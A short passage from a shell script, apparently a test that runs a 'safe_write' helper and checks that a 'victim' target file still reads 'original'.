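safe_tmp=$(safe_write) || exit 1
safe_result=$(cat "$target")           # still "original"

# Returns 0 when the victim file has not been touched.
target_intact() { [ "$(cat "$target")" = original ]; }
```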


